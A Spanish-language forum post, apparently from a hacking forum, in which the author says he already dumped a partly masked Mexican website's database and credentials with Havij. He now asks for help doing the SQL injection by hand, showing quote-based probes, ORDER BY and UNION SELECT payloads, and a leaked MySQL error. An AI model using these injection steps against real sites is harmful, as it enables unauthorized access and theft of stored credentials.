hola amigos miren resulta que hay una web que es vulnerable a injection sql como lo se?? por medio de dos cosas la prime utilize un programa que posteo un usuario la herramienta se llama Havij el cual al poner el url de la pagina en menos de 2 minutos me arojo la bd junto con sus tablas y sus respectivos valores
ustedes se preguntaran entonces para que quieres hacerlo manual mente si ya tienes hasta el
nombre de usuario y contraseña del sistema vos ser un lammer
para nada amigos yo lo que deceo es aprender no me gusta navegar e ir destruyendo por que se que para montar una web se gasta y encuanto pueda descubrir el fallo manualmente den lo por echo que lo reportare con el administrador del sitio bueno miren la url tiene la siguiente estructura
http://www.xxxxx.com.mx/clasificados.php?tipo=10 en el post que publicaron aqui
http://foro.elhacker.net/nivel_web/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.15.htmlcomentan que para saber siuna web es vulnerable basta con poner una comilla simple despues del numero yo lo puse de esta forma
http://www.xxxxx.com.mx/clasificados.php?tipo=10'
el resultado que me arojo ffue el siguiente
Warning
: mysql_num_rows(): supplied argument is not a valid
MySQL result resource in
/home
/[b
]xopin
[/b
]/public_html
/clasificados
.php on line
13
entonces segun el tuto es vulnerable la base de datos de esta web se llama
xopin como estoy tan seguro?? por el programa que les mencione arriva bueno hasta ahi voy bien la dificultad comienza cuando deceo contar el numero de columnas lo intente de la siguiente forma
http://www.xxx.com.mx/clasificados.php?tipo=-1 order by 1,2,3,4,5,6,7 ect hasta llegar a 100
tambien lo intente asi
http://www.xxx.com.mx/clasificados.php?tipo=-1 order by 1 //iva cambiano el 1 por otro numero hasta llegar a 100
y sin resultados aa cabe mencionar que el error del warning siempre estuvo presente no cambio nada siempre estuvo de la siguiente forma
Warning
: mysql_num_rows(): supplied argument is not a valid
MySQL result resource in
/home
/xopin
/public_html
/clasificados
.php on line
13
intente hacerlo con union y tampoco me sale lo ise de la siguiente forma
http://www.xxxx.com.mx/clasificados.php?tipo=-1+union+all+select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ..ect llegue hasta 100
de igual forma el error del warning que da igual , que puede estar pasando? hasta que numero debo de llegar para que me muestre el numero de columnas?